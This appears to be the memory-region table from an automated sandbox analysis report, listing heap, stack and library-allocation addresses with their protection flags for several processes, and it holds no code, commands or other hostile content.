|
trusted library allocation
|
page read and write
|
||
|
A175A4E000
|
stack
|
page read and write
|
||
|
21477FE000
|
stack
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F847B000
|
heap
|
page read and write
|
||
|
202B9668000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE8C0000
|
trusted library allocation
|
page read and write
|
||
|
202B94D0000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BE40F000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBB89BC000
|
heap
|
page read and write
|
||
|
202BA429000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9DE000
|
trusted library allocation
|
page read and write
|
||
|
29D2CF1C000
|
heap
|
page read and write
|
||
|
202BE9C9000
|
trusted library allocation
|
page read and write
|
||
|
25E56470000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202B9680000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
29D2CDC7000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
202BE58C000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E56700000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE880000
|
trusted library allocation
|
page read and write
|
||
|
202BA436000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
29D2C8A1000
|
heap
|
page read and write
|
||
|
7FFAAB3F0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AC000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBB8B00000
|
trusted library allocation
|
page read and write
|
||
|
202B94E9000
|
heap
|
page read and write
|
||
|
29D2CDCA000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E58559000
|
trusted library allocation
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
2146CFE000
|
unkown
|
page readonly
|
||
|
202BE9DC000
|
trusted library allocation
|
page read and write
|
||
|
202BA3FB000
|
heap
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
25E70540000
|
heap
|
page read and write
|
||
|
202BA276000
|
heap
|
page read and write
|
||
|
1F6F8513000
|
heap
|
page read and write
|
||
|
202BFE90000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBF0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
25E58350000
|
heap
|
page read and write
|
||
|
B2DA87A000
|
stack
|
page read and write
|
||
|
29D2C8A1000
|
heap
|
page read and write
|
||
|
29D2CF10000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6F84BC000
|
heap
|
page read and write
|
||
|
202B95D8000
|
trusted library allocation
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
2147B7E000
|
stack
|
page read and write
|
||
|
202BA29B000
|
heap
|
page read and write
|
||
|
D78D9FE000
|
stack
|
page read and write
|
||
|
202BE3AC000
|
heap
|
page read and write
|
||
|
202B9610000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6FDA3F000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
7FFAAB390000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
2147FF9000
|
stack
|
page read and write
|
||
|
202BA432000
|
heap
|
page read and write
|
||
|
B2DA97E000
|
stack
|
page read and write
|
||
|
1BBB89FC000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2CDCA000
|
heap
|
page read and write
|
||
|
29D2C89F000
|
heap
|
page read and write
|
||
|
1F6FD800000
|
trusted library allocation
|
page read and write
|
||
|
202BE405000
|
heap
|
page read and write
|
||
|
D78DB7B000
|
stack
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
202BE747000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC70000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F93E0000
|
trusted library allocation
|
page read and write
|
||
|
1FAB7911000
|
heap
|
page read and write
|
||
|
1BBD2BB1000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
25E70640000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1F6F92A0000
|
trusted library section
|
page readonly
|
||
|
1F6F83A0000
|
heap
|
page read and write
|
||
|
202BE940000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BE9C4000
|
trusted library allocation
|
page read and write
|
||
|
25E70604000
|
heap
|
page read and write
|
||
|
202BA415000
|
heap
|
page read and write
|
||
|
25E58666000
|
trusted library allocation
|
page read and write
|
||
|
202BE40C000
|
heap
|
page read and write
|
||
|
202BE765000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
7FFAACC00000
|
trusted library allocation
|
page read and write
|
||
|
29D2C860000
|
heap
|
page read and write
|
||
|
1BBBACC5000
|
trusted library allocation
|
page read and write
|
||
|
D78D8F8000
|
stack
|
page read and write
|
||
|
202BA240000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202B9668000
|
trusted library allocation
|
page read and write
|
||
|
D78D47E000
|
stack
|
page read and write
|
||
|
55C8FFE000
|
stack
|
page read and write
|
||
|
1BBBC4DF000
|
trusted library allocation
|
page read and write
|
||
|
202BA276000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA291000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
29D2C8B1000
|
heap
|
page read and write
|
||
|
202BE391000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1FAB79A0000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA28D000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA415000
|
heap
|
page read and write
|
||
|
202C0010000
|
trusted library allocation
|
page read and write
|
||
|
214627B000
|
stack
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1F6F8502000
|
heap
|
page read and write
|
||
|
1FAB79CD000
|
heap
|
page read and write
|
||
|
202BE3CC000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBB8AC0000
|
heap
|
page read and write
|
||
|
29D2C869000
|
heap
|
page read and write
|
||
|
29D2C8DA000
|
heap
|
page read and write
|
||
|
202BEA63000
|
trusted library allocation
|
page read and write
|
||
|
202BA298000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
1BBB89B4000
|
heap
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
7FFAACB70000
|
trusted library allocation
|
page read and write
|
||
|
1FAB78D7000
|
heap
|
page read and write
|
||
|
1FAB7912000
|
heap
|
page read and write
|
||
|
202BA276000
|
heap
|
page read and write
|
||
|
1FAB7895000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAAC960000
|
trusted library allocation
|
page read and write
|
||
|
55C8F7E000
|
stack
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE754000
|
trusted library allocation
|
page read and write
|
||
|
202BE3CB000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BE40C000
|
heap
|
page read and write
|
||
|
29D2C8D4000
|
heap
|
page read and write
|
||
|
25E566F0000
|
heap
|
page read and write
|
||
|
25E58567000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB370000
|
trusted library allocation
|
page read and write
|
||
|
1BBB8B4A000
|
heap
|
page read and write
|
||
|
202BE9C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA289000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE33F000
|
heap
|
page read and write
|
||
|
55C933E000
|
stack
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA293000
|
heap
|
page read and write
|
||
|
B2DA9FF000
|
stack
|
page read and write
|
||
|
202BA291000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E56560000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
21467FE000
|
stack
|
page read and write
|
||
|
202BE3CC000
|
heap
|
page read and write
|
||
|
55C9E8E000
|
stack
|
page read and write
|
||
|
1BBD2BDB000
|
heap
|
page read and write
|
||
|
7FFAAB1F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1BBB8BC0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1F6FDAE3000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BE417000
|
heap
|
page read and write
|
||
|
29D2C872000
|
heap
|
page read and write
|
||
|
202B94F2000
|
heap
|
page read and write
|
||
|
1F6FD880000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE9DB000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACC20000
|
trusted library allocation
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
7FFAAB0D0000
|
trusted library allocation
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
1FAB78D3000
|
heap
|
page read and write
|
||
|
1F6F83E0000
|
trusted library section
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
D78D7F6000
|
stack
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAAB310000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A9000
|
heap
|
page read and write
|
||
|
202BE382000
|
heap
|
page read and write
|
||
|
202BA3B0000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE745000
|
trusted library allocation
|
page read and write
|
||
|
25E58A5E000
|
trusted library allocation
|
page read and write
|
||
|
25E70660000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
2146DFB000
|
stack
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
25E70636000
|
heap
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
21468FE000
|
unkown
|
page readonly
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
7FFB0BF76000
|
unkown
|
page readonly
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
202BE970000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA45C000
|
heap
|
page read and write
|
||
|
202BE9C6000
|
trusted library allocation
|
page read and write
|
||
|
202BA44C000
|
heap
|
page read and write
|
||
|
21488FE000
|
unkown
|
page readonly
|
||
|
55CA08B000
|
stack
|
page read and write
|
||
|
29D2CF24000
|
heap
|
page read and write
|
||
|
202BE38D000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
1FAB78B2000
|
heap
|
page read and write
|
||
|
1F6F8492000
|
heap
|
page read and write
|
||
|
202B95FC000
|
trusted library allocation
|
page read and write
|
||
|
202BE3C8000
|
heap
|
page read and write
|
||
|
202BA2BB000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
1FAB785C000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
21481FC000
|
stack
|
page read and write
|
||
|
202BE3D1000
|
heap
|
page read and write
|
||
|
7FFAAB1B6000
|
trusted library allocation
|
page execute and read and write
|
||
|
D78D113000
|
stack
|
page read and write
|
||
|
25E5659F000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202B95F0000
|
trusted library allocation
|
page read and write
|
||
|
202BA276000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1F6F8D00000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E705C7000
|
heap
|
page read and write
|
||
|
202BA436000
|
heap
|
page read and write
|
||
|
25E705D9000
|
heap
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BEA64000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
A17564B000
|
stack
|
page read and write
|
||
|
202BA44C000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBB8991000
|
heap
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
29D2C750000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202B9625000
|
trusted library allocation
|
page read and write
|
||
|
25E56660000
|
heap
|
page read and write
|
||
|
1F6F8476000
|
heap
|
page read and write
|
||
|
202BE751000
|
trusted library allocation
|
page read and write
|
||
|
202BE6F4000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
1BBBAA59000
|
trusted library allocation
|
page read and write
|
||
|
202BE40F000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
1F6FD950000
|
trusted library allocation
|
page read and write
|
||
|
25E565EB000
|
heap
|
page read and write
|
||
|
202BEA66000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2DE000
|
heap
|
page read and write
|
||
|
202BA3B0000
|
remote allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA448000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
29D2C8D2000
|
heap
|
page read and write
|
||
|
202BE9C1000
|
trusted library allocation
|
page read and write
|
||
|
1F6FE000000
|
heap
|
page read and write
|
||
|
202BE75B000
|
trusted library allocation
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BE749000
|
trusted library allocation
|
page read and write
|
||
|
202BA429000
|
heap
|
page read and write
|
||
|
1BBD29C2000
|
heap
|
page read and write
|
||
|
7FFAAB0D2000
|
trusted library allocation
|
page read and write
|
||
|
21474FA000
|
stack
|
page read and write
|
||
|
202BE9D7000
|
trusted library allocation
|
page read and write
|
||
|
202BA290000
|
heap
|
page read and write
|
||
|
7FFAAB3B0000
|
trusted library allocation
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
202B9740000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
202BA429000
|
heap
|
page read and write
|
||
|
202BE749000
|
trusted library allocation
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1BBB8A90000
|
heap
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
202BE3A9000
|
heap
|
page read and write
|
||
|
202BE9D8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAB2B2000
|
trusted library allocation
|
page read and write
|
||
|
202B9668000
|
trusted library allocation
|
page read and write
|
||
|
202BA432000
|
heap
|
page read and write
|
||
|
202BA29F000
|
heap
|
page read and write
|
||
|
7FFAAB420000
|
trusted library allocation
|
page read and write
|
||
|
55C92B9000
|
stack
|
page read and write
|
||
|
202BE9A0000
|
trusted library allocation
|
page read and write
|
||
|
202BA28D000
|
heap
|
page read and write
|
||
|
202B9619000
|
trusted library allocation
|
page read and write
|
||
|
202BE900000
|
trusted library allocation
|
page read and write
|
||
|
202BA3F0000
|
heap
|
page read and write
|
||
|
25E7075A000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1F6FDC20000
|
remote allocation
|
page read and write
|
||
|
1BBB8999000
|
heap
|
page read and write
|
||
|
202B950D000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E705E1000
|
heap
|
page read and write
|
||
|
202BA43E000
|
heap
|
page read and write
|
||
|
1F6FD8C4000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFB1D8A1000
|
unkown
|
page execute read
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
25E586A5000
|
trusted library allocation
|
page read and write
|
||
|
202BE759000
|
trusted library allocation
|
page read and write
|
||
|
21470FE000
|
unkown
|
page readonly
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
25E565AB000
|
heap
|
page read and write
|
||
|
1F6FD8B0000
|
trusted library allocation
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
202BA29A000
|
heap
|
page read and write
|
||
|
1F6F848D000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
29D2C980000
|
trusted library allocation
|
page read and write
|
||
|
1F6F842B000
|
heap
|
page read and write
|
||
|
202BA440000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202B9514000
|
heap
|
page read and write
|
||
|
202BA465000
|
heap
|
page read and write
|
||
|
7FFAAB180000
|
trusted library allocation
|
page read and write
|
||
|
29D2C850000
|
trusted library allocation
|
page read and write
|
||
|
202B94ED000
|
heap
|
page read and write
|
||
|
1BBBC4FF000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A3000
|
heap
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFAAC952000
|
trusted library allocation
|
page read and write
|
||
|
1BBBA7F7000
|
heap
|
page execute and read and write
|
||
|
1F6FDA56000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2BF000
|
heap
|
page read and write
|
||
|
202BE442000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFAAB0DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
29D2C8B1000
|
heap
|
page read and write
|
||
|
202BA28D000
|
heap
|
page read and write
|
||
|
202BFE80000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
1F6FDA4C000
|
heap
|
page read and write
|
||
|
1FAB79E6000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
2147EFE000
|
unkown
|
page readonly
|
||
|
29D2C877000
|
heap
|
page read and write
|
||
|
202BE755000
|
trusted library allocation
|
page read and write
|
||
|
1BBB89F8000
|
heap
|
page read and write
|
||
|
1F6F8BF0000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
A17594E000
|
stack
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
202BA2DB000
|
heap
|
page read and write
|
||
|
202BE472000
|
heap
|
page read and write
|
||
|
202BA44A000
|
heap
|
page read and write
|
||
|
A17574E000
|
stack
|
page read and write
|
||
|
7FFAACC50000
|
trusted library allocation
|
page read and write
|
||
|
29D2C8C3000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
7FFB1D8A0000
|
unkown
|
page readonly
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
29D2CDC2000
|
heap
|
page read and write
|
||
|
202BA295000
|
heap
|
page read and write
|
||
|
D78D19E000
|
unkown
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
25E58510000
|
heap
|
page execute and read and write
|
||
|
202BE3CE000
|
heap
|
page read and write
|
||
|
202BE405000
|
heap
|
page read and write
|
||
|
202BE920000
|
trusted library allocation
|
page read and write
|
||
|
1BBD2A40000
|
heap
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1BBD299D000
|
heap
|
page read and write
|
||
|
1F6F8440000
|
heap
|
page read and write
|
||
|
1F6FD9C0000
|
trusted library allocation
|
page read and write
|
||
|
1F6FDAFD000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
D78DA7E000
|
stack
|
page read and write
|
||
|
25E58589000
|
trusted library allocation
|
page read and write
|
||
|
202B94F6000
|
heap
|
page read and write
|
||
|
1F6F845B000
|
heap
|
page read and write
|
||
|
25E70A60000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA426000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBD2B70000
|
heap
|
page read and write
|
||
|
202BE390000
|
heap
|
page read and write
|
||
|
202BE2D0000
|
heap
|
page read and write
|
||
|
1BBBAF7E000
|
trusted library allocation
|
page read and write
|
||
|
202BE9D3000
|
trusted library allocation
|
page read and write
|
||
|
202BA3F6000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
29D2CDCE000
|
heap
|
page read and write
|
||
|
29D2C8A5000
|
heap
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
1BBCA8A3000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1BBD2C34000
|
heap
|
page read and write
|
||
|
202BA2DB000
|
heap
|
page read and write
|
||
|
1FAB7970000
|
trusted library allocation
|
page read and write
|
||
|
2146BFC000
|
stack
|
page read and write
|
||
|
1BBB8B20000
|
trusted library allocation
|
page read and write
|
||
|
202BA498000
|
heap
|
page read and write
|
||
|
202BE758000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA482000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
1BBCA840000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
25E5859C000
|
trusted library allocation
|
page read and write
|
||
|
202BA2BF000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E70754000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAACA70000
|
trusted library allocation
|
page execute and read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE454000
|
heap
|
page read and write
|
||
|
7FFAAB2D0000
|
trusted library allocation
|
page read and write
|
||
|
202BA2B2000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
202BE3A9000
|
heap
|
page read and write
|
||
|
202BA2DB000
|
heap
|
page read and write
|
||
|
1F6F92F0000
|
trusted library section
|
page readonly
|
||
|
1BBBB10C000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BE745000
|
trusted library allocation
|
page read and write
|
||
|
202BA470000
|
heap
|
page read and write
|
||
|
1F6F8C02000
|
heap
|
page read and write
|
||
|
202BA29C000
|
heap
|
page read and write
|
||
|
25E68550000
|
trusted library allocation
|
page read and write
|
||
|
202BEA69000
|
trusted library allocation
|
page read and write
|
||
|
202BE775000
|
trusted library allocation
|
page read and write
|
||
|
1BBBC4F3000
|
trusted library allocation
|
page read and write
|
||
|
1BBCAB1D000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1F6FD8C0000
|
trusted library allocation
|
page read and write
|
||
|
202BA442000
|
heap
|
page read and write
|
||
|
7FFAAB330000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
25E68541000
|
trusted library allocation
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
7FFAACC60000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
1FAB78DC000
|
heap
|
page read and write
|
||
|
21479FE000
|
unkown
|
page readonly
|
||
|
202BE749000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACB90000
|
trusted library allocation
|
page read and write
|
||
|
214767E000
|
stack
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A5000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BE8A0000
|
trusted library allocation
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
2146FFE000
|
unkown
|
page readonly
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
1F6F9140000
|
trusted library allocation
|
page read and write
|
||
|
25E58347000
|
heap
|
page execute and read and write
|
||
|
202BE9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0BF80000
|
unkown
|
page read and write
|
||
|
202BA3F9000
|
heap
|
page read and write
|
||
|
202BE58C000
|
trusted library allocation
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202BA426000
|
heap
|
page read and write
|
||
|
202BE74E000
|
trusted library allocation
|
page read and write
|
||
|
202BA458000
|
heap
|
page read and write
|
||
|
202BA3B0000
|
remote allocation
|
page read and write
|
||
|
1FAB78D3000
|
heap
|
page read and write
|
||
|
1F6FDB04000
|
heap
|
page read and write
|
||
|
1FAB7960000
|
trusted library allocation
|
page read and write
|
||
|
21469FC000
|
stack
|
page read and write
|
||
|
202B9501000
|
heap
|
page read and write
|
||
|
202BA29E000
|
heap
|
page read and write
|
||
|
202BE9D4000
|
trusted library allocation
|
page read and write
|
||
|
202BE9C8000
|
trusted library allocation
|
page read and write
|
||
|
7FFAACBD0000
|
trusted library allocation
|
page read and write
|
||
|
1FAB78DC000
|
heap
|
page read and write
|
||
|
202BA2AB000
|
heap
|
page read and write
|
||
|
202B9670000
|
trusted library allocation
|
page read and write
|
||
|
202BA290000
|
heap
|
page read and write
|
||
|
1F6FDABC000
|
heap
|
page read and write
|
||
|
202BA446000
|
heap
|
page read and write
|
||
|
7FFAAB0FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
202B9A40000
|
trusted library allocation
|
page read and write
|
||
|
202BA2A4000
|
heap
|
page read and write
|
||
|
